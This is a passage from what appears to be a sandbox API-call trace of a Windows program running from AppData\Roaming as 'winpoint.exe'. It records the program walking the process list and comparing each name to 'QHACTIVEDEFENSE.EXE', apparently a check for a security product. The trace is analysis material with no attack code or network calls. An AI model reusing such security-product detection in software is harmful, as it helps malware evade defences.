!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0162.696] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18eeb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0162.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f774, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x94\xed\x18\xe9\xb0\xfa\x18", lpUsedDefaultChar=0x0) returned 256 [0162.696] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x49a270, nSize=0x104 | out: lpFilename="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winpoint.exe")) returned 0x34 [0162.696] RtlInitializeSListHead (in: ListHead=0x49a040 | out: ListHead=0x49a040) [0162.696] GetLastError () returned 0x0 [0162.696] SetLastError (dwErrCode=0x0) [0162.696] GetEnvironmentStringsW () returned 0x63d848* [0162.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1498 [0162.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1498, lpMultiByteStr=0x63e408, cbMultiByte=1498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1498 [0162.698] FreeEnvironmentStringsW (penv=0x63d848) returned 1 [0162.699] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75c90000 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="FlsAlloc") returned 0x75ca4f2b [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="FlsFree") returned 0x75ca359f [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="FlsGetValue") returned 0x75ca1252 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="FlsSetValue") returned 0x75ca4208 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeCriticalSectionEx") returned 0x75ca4d28 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="InitOnceExecuteOnce") returned 0x75cbd627 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="CreateEventExW") returned 0x75d2410b [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CreateSemaphoreW") returned 0x75cbca5a [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CreateSemaphoreExW") returned 0x75d24195 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CreateThreadpoolTimer") returned 0x75cbee7e [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadpoolTimer") returned 0x77d7441c [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77d9c50e [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CloseThreadpoolTimer") returned 0x77d9c381 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CreateThreadpoolWait") returned 0x75cbf088 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadpoolWait") returned 0x77d805d7 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CloseThreadpoolWait") returned 0x77d9ca24 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="FlushProcessWriteBuffers") returned 0x77d50b8c [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77e0fde8 [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcessorNumber") returned 0x77da1e1d [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="CreateSymbolicLinkW") returned 0x75d1cd11 [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentPackageId") returned 0x0 [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetTickCount64") returned 0x75cbeee0 [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileInformationByHandleEx") returned 0x75cbc78f [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="SetFileInformationByHandle") returned 0x75cccbfc [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeConditionVariable") returned 0x77d68456 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="WakeConditionVariable") returned 0x77dd7de4 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="WakeAllConditionVariable") returned 0x77d9409d [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="SleepConditionVariableCS") returned 0x75d24b32 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeSRWLock") returned 0x77d68456 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="AcquireSRWLockExclusive") returned 0x77d629f1 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77d74892 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="ReleaseSRWLockExclusive") returned 0x77d629ab [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="SleepConditionVariableSRW") returned 0x75d24b74 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="CreateThreadpoolWork") returned 0x75cbee45 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="SubmitThreadpoolWork") returned 0x77da8491 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="CloseThreadpoolWork") returned 0x77d9d8e2 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="CompareStringEx") returned 0x75d246b1 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="GetLocaleInfoEx") returned 0x75d24751 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="LCMapStringEx") returned 0x75d247f1 [0162.703] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75c90000 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeConditionVariable") returned 0x77d68456 [0162.704] GetProcAddress (hModule=0x75c90000, lpProcName="SleepConditionVariableCS") returned 0x75d24b32 [0162.705] GetProcAddress (hModule=0x75c90000, lpProcName="WakeAllConditionVariable") returned 0x77d9409d [0162.705] RtlInitializeConditionVariable () returned 0x49a024 [0162.705] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0162.705] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x450139) returned 0x0 [0162.706] lstrlenW (lpString="FossPass") returned 8 [0162.706] lstrlenW (lpString="FossPass") returned 8 [0162.706] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75c90000 [0162.706] GetProcAddress (hModule=0x75c90000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x75d23f49 [0162.706] GetProcAddress (hModule=0x75c90000, lpProcName="ProcessIdToSessionId") returned 0x75ca1275 [0162.706] GetCurrentProcessId () returned 0x870 [0162.706] ProcessIdToSessionId (in: dwProcessId=0x870, pSessionId=0x49aa38 | out: pSessionId=0x49aa38) returned 1 [0162.707] CreateSemaphoreW (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0xd8 [0162.707] GetCurrentProcess () returned 0xffffffff [0162.707] GetCurrentThread () returned 0xfffffffe [0162.707] GetCurrentProcess () returned 0xffffffff [0162.707] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63e778, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63e778*=0xdc) returned 1 [0162.707] GetCurrentThreadId () returned 0x650 [0162.707] SetThreadPriority (hThread=0xdc, nPriority=0) returned 1 [0162.707] QueryPerformanceCounter (in: lpPerformanceCount=0x49aa60 | out: lpPerformanceCount=0x49aa60*=28092257394) returned 1 [0162.707] QueryPerformanceFrequency (in: lpFrequency=0x49aa70 | out: lpFrequency=0x49aa70) returned 1 [0162.707] lstrlenW (lpString="") returned 0 [0162.708] lstrlenA (lpString="Non-def App") returned 11 [0162.708] GetStartupInfoW (in: lpStartupInfo=0x18fad0 | out: lpStartupInfo=0x18fad0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0162.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0162.711] lstrcpyW (in: lpString1=0x18f8e4, lpString2="QHACTIVEDEFENSE.EXE" | out: lpString1="QHACTIVEDEFENSE.EXE") returned="QHACTIVEDEFENSE.EXE" [0162.711] lstrlenW (lpString="QHACTIVEDEFENSE.EXE") returned 19 [0162.711] CharUpperBuffW (in: lpsz="QHACTIVEDEFENSE.EXE", cchLength=0x13 | out: lpsz="QHACTIVEDEFENSE.EXE") returned 0x13 [0162.711] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.711] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0162.711] lstrlenW (lpString="[System Process]") returned 16 [0162.711] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0162.711] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.714] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.714] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0162.714] lstrlenW (lpString="System") returned 6 [0162.714] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0162.715] lstrcmpW (lpString1="SYSTEM", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.715] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.715] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0162.715] lstrlenW (lpString="smss.exe") returned 8 [0162.715] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0162.715] lstrcmpW (lpString1="SMSS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.715] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.716] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0162.716] lstrlenW (lpString="csrss.exe") returned 9 [0162.716] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0162.716] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.716] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.717] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0162.717] lstrlenW (lpString="wininit.exe") returned 11 [0162.717] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0162.717] lstrcmpW (lpString1="WININIT.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.717] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.718] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0162.718] lstrlenW (lpString="csrss.exe") returned 9 [0162.718] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0162.718] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.718] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.719] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0162.719] lstrlenW (lpString="winlogon.exe") returned 12 [0162.719] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0162.719] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.719] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.719] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0162.719] lstrlenW (lpString="services.exe") returned 12 [0162.719] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0162.719] lstrcmpW (lpString1="SERVICES.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.719] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.720] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0162.720] lstrlenW (lpString="lsass.exe") returned 9 [0162.720] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0162.720] lstrcmpW (lpString1="LSASS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.720] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0162.721] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0162.721] lstrlenW (lpString="lsm.exe") returned 7 [0162.721] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0162.721] lstrcmpW (lpString1="LSM.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.721] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.722] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.722] lstrlenW (lpString="svchost.exe") returned 11 [0162.722] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.722] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.722] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.722] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.722] lstrlenW (lpString="svchost.exe") returned 11 [0162.722] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.722] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.722] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.723] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.723] lstrlenW (lpString="svchost.exe") returned 11 [0162.723] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.723] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.723] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.724] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.724] lstrlenW (lpString="svchost.exe") returned 11 [0162.724] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.724] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.724] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.725] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.725] lstrlenW (lpString="svchost.exe") returned 11 [0162.725] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.725] lstrcmpW 